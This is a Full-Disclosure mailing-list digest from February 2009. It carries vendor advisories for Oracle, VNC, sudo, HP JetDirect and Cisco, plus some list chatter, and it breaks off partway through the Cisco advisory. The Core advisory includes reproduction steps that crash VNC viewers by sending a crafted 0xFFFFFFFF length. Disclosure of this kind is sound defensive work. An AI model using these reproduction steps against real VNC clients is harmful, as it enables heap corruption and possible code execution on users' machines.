14:48:48 2009 From: ureleet at gmail.com (Ureleet) Date: Tue, 3 Feb 2009 09:48:48 -0500 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: <003d01c9856a$a3bd2780$eb377680$@co.uk> References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> Message-ID: <6158bb410902030648t173c6ad2ufa40a952cb491a6f@mail.gmail.com> y not have ur os secure in the first place and designed with full permissions instead of bothering the user. look at linux, look at unix. theyve been doing it 4 years. On Mon, Feb 2, 2009 at 2:14 PM, Christopher Pritchard wrote: >> The biggest issue here is that although it's technically easy to fix >> this problem (just have UAC issue an alert when somebody's messing with >> the system settings), it involves doing more of what end users dislike >> most about UAC (it issuing alerts to Joe Sixpack all the time when he >> does something bone-headed security-wise). >> >> Fixing this one in a way that users will put up with will be a bitch. > > Why not just have it not prompt if you are changing settings, except for UAC settings? that would be the simple way around it > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From Valdis.Kletnieks at vt.edu Tue Feb 3 15:09:45 2009 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Tue, 03 Feb 2009 10:09:45 -0500 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: Your message of "Tue, 03 Feb 2009 09:48:48 EST." <6158bb410902030648t173c6ad2ufa40a952cb491a6f@mail.gmail.com> References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <6158bb410902030648t173c6ad2ufa40a952cb491a6f@mail.gmail.com> Message-ID: <99936.1233673785@turing-police.cc.vt.edu> On Tue, 03 Feb 2009 09:48:48 EST, Ureleet said: > y not have ur os secure in the first place and designed with full > permissions instead of bothering the user. look at linux, look at > unix. theyve been doing it 4 years. Well, that *would* be an alternate way to design a system - but how would you migrate an existing Windows box to a Windows 8 that did that? There is *such* a mass of software written specifically around all the cruft in the Windows APIs that the inertia is the single biggest reason people keep running Windows boxes. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090203/2629011f/attachment.bin From imipak at gmail.com Tue Feb 3 15:37:43 2009 From: imipak at gmail.com (imipak) Date: Tue, 3 Feb 2009 15:37:43 +0000 Subject: [Full-disclosure] BBC "cyber war" piece Message-ID: "Nato officials have told the BBC their computers are under constant attack from organisations and individuals bent on trying to hack into their secrets." http://news.bbc.co.uk/go/rss/-/1/hi/world/europe/7851292.stm (NB - the author of that piece, IMNSHO, has a tendency to sound like an uncritical mouthpiece for the military-spooky complex.) =i -- make way for history flickering like a long-lost memory From pete.licoln at gmail.com Tue Feb 3 16:21:19 2009 From: pete.licoln at gmail.com (Pete Licoln) Date: Tue, 3 Feb 2009 11:21:19 -0500 Subject: [Full-disclosure] Administrivia: Spring Cleaning In-Reply-To: <6158bb410902030647o33cff270k1d5967db1eaa98f2@mail.gmail.com> References: <6158bb410902030647o33cff270k1d5967db1eaa98f2@mail.gmail.com> Message-ID: Who cares anyway ? 2009/2/3 Ureleet > > > i guarantee hes watching right now. > > On Mon, Feb 2, 2009 at 12:32 AM, Biz Marqee wrote: > > n3td3v being moderated is fantastic. > > > > his banning is not a strike against the "spirit" of fd, its someone > standing > > up and saying "I have had enough of this fruitcake". > > > > full disclosure is great when its dropping 0day, discussing security in > > general, coming off as a righteous plan9 ninja, insulting people who > > disagree with your opinion and all the rest that goes along with it. it > isnt > > great when you have a serial pest constantly baiting people and flooding > the > > list with junk... junk that has no technical or even comedic value. its > just > > rambling. he isnt some passing troll.. 3 years this guy has been spouting > > his nonsense and i am sure this isnt a decision that John takes lightly > but > > something needed to be done before everyone left. > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090203/3189b597/attachment.html From shatter at appsecinc.com Tue Feb 3 17:55:11 2009 From: shatter at appsecinc.com (Shatter) Date: Tue, 3 Feb 2009 12:55:11 -0500 Subject: [Full-disclosure] Team SHATTER Security Advisory: SQL Injection in Oracle Enterprise Manager (TARGET Parameter) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Team SHATTER Security Advisory SQL Injection in Oracle Enterprise Manager (TARGET Parameter) January 29, 2009 Risk Level: Medium Affected versions: Oracle Enterprise Manager 10g Grid Control 10.2.0.4 and previous patchsets Remote exploitable: Yes (Authentication is needed) Credits: This vulnerability was discovered and researched by Esteban Mart?nez Fay? of Application Security Inc. Details: SQL Injection works by attempting to modify the parameters passed to an application to change the SQL statements that are passed to a database. SQL injection can be used to insert additional SQL statements to be executed. The "TARGET" parameter used in web page /em/console/reports/admin of Oracle Enterprise Manager web application is vulnerable to SQL Injection attacks. It may be possible for a malicious user to execute a function with the elevated privileges of the SYSMAN database user in the repository database. This user has the DBA role granted. Impact: This vulnerability allow a Oracle Enterprise Manager user with VIEW (or more) privileges to execute a function call with the elevated privileges of the SYSMAN database user. Vendor Status: Vendor was contacted and a patch was released. Workaround: There is no workaround for this issue. Fix: Apply Oracle Critical Patch Update January 2009 available at Oracle Metalink. CVE: CVE-2008-5447 Links: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html Timeline: Vendor Notification - 7/11/2008 Vendor Response - 7/14/2008 Fix - 1/13/2009 Public Disclosure - 1/29/2009 Application Security, Inc's database security solutions have helped over 1000 organizations secure their databases from all internal and external threats while also ensuring that those organizations meet or exceed regulatory compliance and audit requirements. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) - WinPT 1.2.0 iD8DBQFJiIST9EOAcmTuFN0RAm6pAKDHp1EHjVu0lxzzNK2ANJJLzMNrvQCgxplB KsqKYUSlrpMTg9Bc7lKqy+Y= =bSNt -----END PGP SIGNATURE----- From shatter at appsecinc.com Tue Feb 3 17:57:56 2009 From: shatter at appsecinc.com (Shatter) Date: Tue, 3 Feb 2009 12:57:56 -0500 Subject: [Full-disclosure] Team SHATTER Security Advisory: Oracle Database Buffer Overflow in SYS.OLAPIMPL_T.ODCITABLESTART Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Team SHATTER Security Advisory Oracle Database Buffer Overflow in SYS.OLAPIMPL_T.ODCITABLESTART January 29, 2009 Risk Level: High Affected versions: Oracle Database Server version 9iR2 Remote exploitable: Yes (Authentication to Database Server is needed) Credits: This vulnerability was discovered and researched by Esteban Mart?nez Fay? of Application Security Inc. Details: Oracle Database Server provides the SYS.OLAPIMPL_T package. This package contains the procedure ODCITABLESTART which is vulnerable to buffer overflow attacks. Impact: By default SYS.OLAPIMPL_T has EXECUTE permission to PUBLIC so any Oracle database user can exploit this vulnerability. Exploitation of this vulnerability allows an attacker to execute arbitrary code. It can also be exploited to cause DoS (Denial of service) killing the Oracle server process. Vendor Status: Vendor was contacted and a patch was released. Workaround: Restrict access to the SYS.OLAPIMPL_T package. Fix: Apply Oracle Critical Patch Update January 2009 available at Oracle Metalink. CVE: CVE-2008-3974 Links: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html http://www.appsecinc.com/resources/alerts/oracle/2009-02.shtml Timeline: Vendor Notification - 2/22/2005 Fix - 1/13/2009 Public Disclosure - 1/29/2009 Application Security, Inc's database security solutions have helped over 1000 organizations secure their databases from all internal and external threats while also ensuring that those organizations meet or exceed regulatory compliance and audit requirements. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) - WinPT 1.2.0 iD8DBQFJiIWQ9EOAcmTuFN0RAv+kAJ9RjYAJaLMJoNMvVs4yexLgE7KZ3ACgsaf2 W5Hipr89dBLv1um+VRaM9Ds= =cLj7 -----END PGP SIGNATURE----- From advisories at coresecurity.com Tue Feb 3 20:11:46 2009 From: advisories at coresecurity.com (CORE Security Technologies Advisories) Date: Tue, 03 Feb 2009 18:11:46 -0200 Subject: [Full-disclosure] CORE-2008-1009 - VNC Multiple Integer Overflows Message-ID: <4988A502.3090904@coresecurity.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ VNC Multiple Integer Overflows 1. *Advisory Information* Title: VNC Multiple Integer Overflows Advisory ID: CORE-2008-1009 Advisory URL: http://www.coresecurity.com/content/vnc-integer-overflows Date published: 2009-02-03 Date of last update: 2009-02-03 Vendors contacted: UltraVNC, TightVNC Release mode: Coordinated release 2. *Vulnerability Information* Class: Integer overflow Remotely Exploitable: Yes Locally Exploitable: No Bugtraq ID: 33568 CVE Name: CVE-2009-0388 3. *Vulnerability Description* Multiple integer overflow vulnerabilities have been discovered in UltraVNC [1] and TightVNC [2], two (open source) remote control applications derived from the popular VNC [3] software. The vulnerabilities cause a miscalculation of a buffer size on the heap, allowing an attacker to corrupt a VNC client heap and can probably allow code execution (exploitation is very likely). 4. *Vulnerable packages* . UltraVNC - 1.0.2 . UltraVNC - 1.0.5 . TightVnc - 1.3.9 . Older versions are probably affected too, but they were not tested 5. *Non-vulnerable packages* . UltraVNC - 1.0.5.4 . TightVNC - 1.3.10 6. *Vendor Information, Solutions and Workarounds* VNC users connecting to untrusted servers should update their VNC viewers/clients. The UltraVNC team has released patched binaries [4] for its viewer. Additional information can be found in the UltraVNC Forum (http://forum.ultravnc.info/). The TightVNC team has released patched source code in [5]. TightVNC 1.3.10 will be released by Feb 10th 2009. 7. *Credits* These vulnerabilities were discovered and researched by Ariel Futoransky, Fernando Russ and Alfredo Ortega from Core Security Technologies. 8. *Technical Description / Proof of Concept Code* Multiple integer overflow vulnerabilities have been discovered in UltraVNC and TightVNC. The vulnerable functions are located in 'ClientConnection.cpp', and they are: . 'ClientConnection::CheckBufferSize' . 'ClientConnection::CheckFileZipBufferSize' These functions are used in UltraVNC - 1.0.2 (and previous versions): . 'ClientConnection::ReadServerCutText() : 3859' . 'ClientConnection::Authenticate() : 1701' And in TightVNC - 1.3.9 (and previous versions): . 'ClientConnection::ReadServerCutText() : 2951' . 'ClientConnection::ReadFailureReason() : 3066' Other versions may be vulnerable too. Multiple VNC clients are affected, as they share the vulnerable code. The integer overflow follows this pattern: /----------- unsigned int len; /* note the *unsigned int* */ // read len from the net len = network.read_placeholder(); // check the size to ensure the network related read buffer is of the bigger as need CheckBufferSize( len ); // or CheckZipBufferSize(len); // use network related red buffer // ... - -----------/ where 'CheckBufferSize' looks like: /----------- (ClientConnection.cpp) 4185: // Makes sure netbuf is at least as big as the specified size. 4186: // Note that netbuf itself may change as a result of this call. 4187: // Throws an exception on failure. 4188: void ClientConnection::CheckBufferSize(int bufsize) 4189: { 4190: if (m_netbufsize > bufsize) return; ... ... - -----------/ and 'CheckZipBufferSize' looks like: /----------- (ClientConnection.cpp) 4238: void ClientConnection::CheckFileZipBufferSize(int bufsize) 4239: { 4240: unsigned char *newbuf; 4241: 4242: if (m_filezipbufsize > bufsize) return; ... ... - -----------/ Also, other functions like 'CheckFileZipBufferSize()' and 'CheckFileChunkBufferSize()' follow the same vulnerable pattern. The integer overflow will ensue a heap corruption in the function 'ReadString()', often called after the bug in 'CheckBufferSize()'. This is not a comprehensive list of possible memory corruptions caused by this bug, as the vulnerable function is used in many places. The integer overflow is caused because the data types of the argument 'bufsize' (signed int) and the buffers size member (unsigned long), 'm_netbufsize' and 'm_filezipbufsize'. Both are 'unsigned long', so: '(unsigned long)-1 > (int)42 == TRUE' because all the comparison was "casted" to unsigned long... (0xFFFFFFFF > 0x2a). Steps to reproduce: The quickest way to reproduce this bug is by modifying the VNC server to send crafted evil packets as: /----------- (from the TightVNC vncClient.cpp sourcecode...) 358: BOOL vncClientThread::SendTextStringMessage(const char *str) 359: { 360: CARD32 len = Swap32IfLE(strlen(str)); 361: if (!m_socket->SendExact((char *)&len, sizeof(len))) 362: return FALSE; 363: if (!m_socket->SendExact(str, strlen(str))) 364: return FALSE; 365: 366: return TRUE; 367: } ... - -----------/ modifying the line 360, a crafted length like 0xFFFFFFFF triggers an exception in the following functions: . In the case of UltraVNC, in 'ClientConnection::Authenticate()' . In the case of TightVNC, in 'ClientConnection::ReadFailureReason()' To trigger the bug in the function 'ClientConnection::CheckBufferSize' located in the file 'ClientConnection.cpp' (both vendors): /----------- (vncClient.cpp) 1848: void vncClient::UpdateClipText(LPSTR text) 1849: { .. .. 1858: rfbServerCutTextMsg message; 1860: message.length = Swap32IfLE(strlen(text)); 1861: if (!SendRFBMsg(rfbServerCutText, (BYTE *) &message, sizeof(message))) 1862: { 1863: Kill(); 1864: return; 1865: } 1866: if (!m_socket->SendQueued(text, strlen(text))) 1867: { 1868: Kill(); 1869: return; 1870: } 1871: } .. - -----------/ In line 1860 the 'message.length' structure must be modified to some evil value like 0xFFFFFFFF. 9. *Report Timeline* . 2009-01-09: Core notifies the TightVNC team of the vulnerability. . 2009-01-09: Core notifies the UltraVNC team of the vulnerability. . 2009-01-10: The UltraVNC team asks Core for a technical description of the vulnerability. . 2009-01-12: Core notifies the TightVNC team of the vulnerability. The previous email sent by Core was rejected by the vendor email service. . 2009-01-12: Technical details sent to UltraVNC team by Core. . 2009-01-14: The TightVNC team asks Core for a technical description of the vulnerability. . 2009-01-14: Technical details sent to TightVNC team by Core. . 2009-01-21: TightVNC team notifies Core that a fix has been produced, but the release of the fixed version (TightVNC 1.3.10) will be available early February. TightVNC team releases the fix for its SVN users [5]. . 2009-01-26: Core asks TightVNC if the fixed version will be available on 02-Feb-2009. No reply received. . 2009-01-26: Core asks UltraVNC team if a fixed version is available. . 2009-01-26: UltraVNC team notifies Core that a fixed version will probably be available on Feb 1st 2009. . 2009-01-30: Core notifies TightVNC and UltraVNC teams the advisory will be released on Feb 3rd 2009, given that the vulnerability was already made public [5]. . 2009-02-02: UltraVNC team notifies Core that a fix has been produced and will be available to the users on Tuesday, Feb 3rd. . 2009-02-02: TightVNC team notifies Core that a patched version will be available to the users on Tuesday, Feb 10th. . 2009-02-03: CORE-2008-1009 advisory is published. 10. *References* [1] http://www.uvnc.com. [2] http://www.tightvnc.com. [3] http://www.realvnc.com. [4] UltraVNC binary patches: http://support1.uvnc.com/download/vncviewer_1054_w32.zip and http://support1.uvnc.com/download/vncviewer_1054_X64.zip. [5] http://vnc-tight.svn.sourceforge.net/viewvc/vnc-tight?view=rev&revision=3564. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJiKUCyNibggitWa0RAvpmAJ0ckztpZ9PyAmA+YE03PNo3O9YCegCeO1HD 8LdXEbiysMMH42Q4sAQMJqA= =CRlF -----END PGP SIGNATURE----- From marcio.barbado at gmail.com Tue Feb 3 21:40:56 2009 From: marcio.barbado at gmail.com (M.B.Jr.) Date: Tue, 3 Feb 2009 19:40:56 -0200 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: <003d01c9856a$a3bd2780$eb377680$@co.uk> References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> Message-ID: <2df3b0cb0902031340k70ffc9d9l73c095672773228b@mail.gmail.com> Windows says: Hello world! Check this out, world, this is really cool. Now I have, uh, something like, uh, "privileges management"! "UAC" is no more than a new commercial designation for something with about 40 years. And they (Redmond) are still missing the concept's point. On Mon, Feb 2, 2009 at 5:14 PM, Christopher Pritchard wrote: >> The biggest issue here is that although it's technically easy to fix >> this problem (just have UAC issue an alert when somebody's messing with >> the system settings), it involves doing more of what end users dislike >> most about UAC (it issuing alerts to Joe Sixpack all the time when he >> does something bone-headed security-wise). >> >> Fixing this one in a way that users will put up with will be a bitch. > > Why not just have it not prompt if you are changing settings, except for UAC settings? that would be the simple way around it > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- Marcio Barbado, Jr. From biz.marqee at gmail.com Wed Feb 4 00:21:56 2009 From: biz.marqee at gmail.com (Biz Marqee) Date: Wed, 4 Feb 2009 11:21:56 +1100 Subject: [Full-disclosure] Administrivia: Spring Cleaning In-Reply-To: <6158bb410902030647o33cff270k1d5967db1eaa98f2@mail.gmail.com> References: <6158bb410902030647o33cff270k1d5967db1eaa98f2@mail.gmail.com> Message-ID: yea he is watching - hes been emailing me direct to respond to my criticism. welcome to my trash folder. if nothing else this will make his pathetic existence on this list more difficult. you never know he might actually get the point and fuck off for good... but im not holding my breath on that one On Wed, Feb 4, 2009 at :47 AM, Ureleet wrote: > i m willing to bet he is still on the list tho. who knows how many > aliases he has. no--i m not 1, even tho he accuses me of being 1. > > i guarantee hes watching right now. > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090204/5bd9b6f4/attachment.html From security at mandriva.com Wed Feb 4 14:47:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Wed, 04 Feb 2009 15:47:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:033 ] sudo Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:033 http://www.mandriva.com/security/ _______________________________________________________________________ Package : sudo Date : February 4, 2009 Affected: 2008.0, 2008.1, 2009.0 _______________________________________________________________________ Problem Description: A vulnerability has been identified in sudo which allowed - depending on the sudoers rules - a sudo-user to execute arbitrary shell commands as root (CVE-2009-0034). The updated packages have been patched to prevent this. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0034 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 41418ab92af8d15bcd8c91d88ee98de6 2008.0/i586/sudo-1.6.9p5-1.1mdv2008.0.i586.rpm 5ddf7f6da238512c60b1a4e01300c2cc 2008.0/SRPMS/sudo-1.6.9p5-1.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 066fc052116881512c507761701e5703 2008.0/x86_64/sudo-1.6.9p5-1.1mdv2008.0.x86_64.rpm 5ddf7f6da238512c60b1a4e01300c2cc 2008.0/SRPMS/sudo-1.6.9p5-1.1mdv2008.0.src.rpm Mandriva Linux 2008.1: 04b1f43831ddc179780d46b92b5ceda8 2008.1/i586/sudo-1.6.9p13-1.1mdv2008.1.i586.rpm 74c9baf4110de86f5d10ff07d9e320dc 2008.1/SRPMS/sudo-1.6.9p13-1.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 32855dcd816e88e97293cec6eaabfd96 2008.1/x86_64/sudo-1.6.9p13-1.1mdv2008.1.x86_64.rpm 74c9baf4110de86f5d10ff07d9e320dc 2008.1/SRPMS/sudo-1.6.9p13-1.1mdv2008.1.src.rpm Mandriva Linux 2009.0: a10f0612563862401aef2d1eda3518f2 2009.0/i586/sudo-1.6.9p17-1.1mdv2009.0.i586.rpm 374b44d579c20a4965ed83e6a1e2954b 2009.0/SRPMS/sudo-1.6.9p17-1.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 3a720d40956ffb88f09d205d1bf43a6a 2009.0/x86_64/sudo-1.6.9p17-1.1mdv2009.0.x86_64.rpm 374b44d579c20a4965ed83e6a1e2954b 2009.0/SRPMS/sudo-1.6.9p17-1.1mdv2009.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJiX4jmqjQ0CJFipgRAnkGAKDqOmjaGoul21q1/F9dOGcrOmYq8wCg887R kHWDBfh4S8002772bKxQzR4= =aNhF -----END PGP SIGNATURE----- From DDI.VulnerabilityAlert at ddifrontline.com Wed Feb 4 14:40:50 2009 From: DDI.VulnerabilityAlert at ddifrontline.com (DDI_Vulnerability_Alert) Date: Wed, 4 Feb 2009 08:40:50 -0600 Subject: [Full-disclosure] DDIVRT-2008-19 HP JetDirect Web Administration Directory Traversal Message-ID: <2571D31D42513640AE1632FEE100E0E402DD7487@hypercom.defense.local> Title ----- DDIVRT-2008-19 HP JetDirect Web Administration Directory Traversal Severity -------- High Date Discovered --------------- October 23, 2008 Discovered By ------------- Digital Defense, Inc. Vulnerability Research Team Credit: Shmoov and r at b13$ Vulnerability Description ------------------------- The HP-ChaiSOE/1.0 embedded web server on certain HP JetDirect printers allows a potential attacker to gain read only access to directories and files outside of the web root. An attacker can leverage this flaw to read arbitrary system configuration files, cached documents, etc. Information obtained from an affected host may facilitate further attacks against the host. Exploitation of this flaw is trivial using common web server directory traversal techniques. Solution Description -------------------- The vendor has released an update. See http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c 01623905 for more details. Digital Defense, Inc. recommends restricting access to the HP JetDirect web administration interface to authorized hosts only. Tested Systems / Software (with versions) ------------------------------------------ Embedded web server HP-ChaiSOE/1.0 on: HP JetDirect 2420 HP JetDirect 4250 Vendor Contact -------------- HP http://www.hp.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090204/efc85122/attachment.html From psirt at cisco.com Wed Feb 4 16:41:40 2009 From: psirt at cisco.com (Cisco Systems Product Security Incident Response Team) Date: Wed, 4 Feb 2009 11:41:40 -0500 Subject: [Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in Cisco Wireless LAN Controllers Message-ID: <200902041141.wlc@psirt.cisco.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Multiple Vulnerabilities in Cisco Wireless LAN Controllers Advisory ID: cisco-sa-20090204-wlc http://www.cisco.com/warp/public/707/cisco-sa-20090204-wlc.shtml Revision 1.0 For Public Release 2009 February 04 1600 UTC (GMT) Summary ======= Multiple vulnerabilities exist in the Cisco Wireless LAN Controllers (WLCs), Cisco Catalyst 6500 Wireless Services Modules (WiSMs), and Cisco Catalyst 3750 Integrated Wireless LAN Controllers. This security advisory outlines details of the following vulnerabilities: * Denial of Service Vulnerabilities (total of three) * Privilege Escalation Vulnerability These vulnerabilities are independent of each other. Cisco has released free software updates that address these vulnerabilities. There are no workarounds available for these vulnerabilities. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20090204-wlc.shtml. Affected Products ================= Vulnerable Products +------------------ The following products and software versions are affected for each vulnerability. Denial of Service Vulnerabilities +-------------------------------- Two denial of service (DoS) vulnerabilities affect software versions 4.2 and later. All Cisco Wireless LAN Controller (WLC) platforms are affected. A third DoS vulnerability affects software versions 4.1 and later. The following platforms are affected by this vulnerability: * Cisco 4400 Series Wireless LAN Controllers * Cisco 4100 Series Wireless LAN Controllers * Cisco Catalyst 6500 Series/7600 Series Wireless Services Module (WiSM) * Cisco Catalyst 3750 Series Integrated Wireless LAN Controllers Note: The Cisco Wireless LAN Controller Modules supported on Cisco 2800 and 3800 series Integrated Services Routers are not vulnerable. The Cisco 2000 and 2100 Series Wireless LAN Controllers are also not affected by this vulnerability. Privilege Escalation Vulnerability +--------------------------------- Only WLC software version 4.2.173.0 is affected by this vulnerability. Determination of Software Versions +--------------------------------- To determine the WLC version that is running in a given environment, use one of the following methods: * In the web interface, choose the Monitor tab, click Summary in the left pane, and note the Software Version. * From the command-line interface, type "show sysinfo" and note the Product Version, as shown in the following example: (Cisco Controller) >show sysinfo Manufacturer's Name.. Cisco Systems Inc. Product Name......... Cisco Controller Product Version...... 5.1.151.0 RTOS Version......... Linux-2.6.10_mvl401 Bootloader Version... 4.0.207.0 Build Type........... DATA + WPS Use the "show wism module controller 1 status" command on a Cisco Catalyst 6500 Series/7600 Series switch if using a WiSM, and note the Software Version, as demonstrated in the following example: Router#show wism mod 3 controller 1 status WiSM Controller 1 in Slot 3 Operational Status of the Controller : Oper-Up Service VLAN : 192 Service Port : 10 Service Port Mac Address : 0011.92ff.8742 Service IP Address : 192.168.10.1 Management IP Address : 192.168.1.123 Software Version : 5.1.151.0 Port Channel Number : 288 Allowed vlan list : 30,40 Native VLAN ID : 40 WCP Keep Alive Missed : 0 Products Confirmed Not Vulnerable +-------------------------------- No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= Cisco Wireless LAN Controllers (WLCs), Cisco Catalyst 6500 Wireless Services Modules (WiSMs), and Cisco Catalyst 3750 Integrated Wireless LAN Controllers are responsible for system-wide wireless LAN functions, such as security policies, intrusion prevention, RF management, quality of service (QoS), and mobility. These devices communicate with Controller-based Access Points over any Layer 2 (Ethernet) or Layer 3 (IP) infrastructure using the Lightweight Access Point Protocol (LWAPP). This Security Advisory describes multiple distinct vulnerabilities in the WLCs, WiSMs, and the Cisco Catalyst 3750 Integrated WLCs. These vulnerabilities are independent of each other. Denial of Service Vulnerabilities +-------------------------------- These vulnerabilities are documented in the following Cisco Bug ID and have been assigned the following Common Vulnerabilities and Exposures (CVE) identifiers: * CSCsq44516 - CVE-2009-0058 Web authentication is a Layer 3 security feature that causes the controller to drop IP traffic (except DHCP and DNS related packets) from a particular client until that client has correctly supplied a valid username and password. An attacker may use a vulnerability scanner to cause the device to stop servicing web authentication or cause a reload of the device. The following error messages may appear on the console during an active attack: SshPmStMain/pm_st_main.c:1954/ ssh_pm_st_main_batch_addition_result: Failed to add rule to the engine: restoring old state SshEnginePmApiPm/engine_pm_api_pm.c:1896/ ssh_pme_enable_policy_lookup: Could not allocate message * CSCsm82364 - CVE-2009-0059 An attacker may cause a device reload when sending a malformed post to the web authentication "login.html" page. The following error messages may appear on the WLC console during this attack: Cisco Crash Handler Signal generated during a signal 11, count 193 Memory 0x14ef1e44 has been freed! Note: A crash file is not generated during this attack. * CSCso60979 - CVE-2009-0061 Affected Cisco WLC, WiSM and Catalyst 3750 Wireless LAN Controller models are vulnerable to a DoS condition that is triggered by the receipt of certain IP packets. Upon receiving these IP packets, the affected device may become unresponsive and require a reboot to recover. Note: This vulnerability affects software versions 4.1 and later in the Cisco 4400 series WLCs, Cisco Catalyst 6500 WiSM, and the Cisco Catalyst 3750 Integrated Wireless LAN Controllers. Cisco 4100, 2100, and 2000 series WLCs are not affected by this vulnerability. Privilege Escalation Vulnerability +--------------------------------- A privilege escalation vulnerability exists only in WLC software version 4.2.173.0, and could allow a restricted user (i.e., Lobby Admin) to gain full administrative rights on the affected system. Note: Wireless network users are not affected by this vulnerability. This vulnerability is documented in Cisco Bug ID CSCsv62283 and has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2009-0062. Vulnerability Scoring Details +---------------------------- Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental 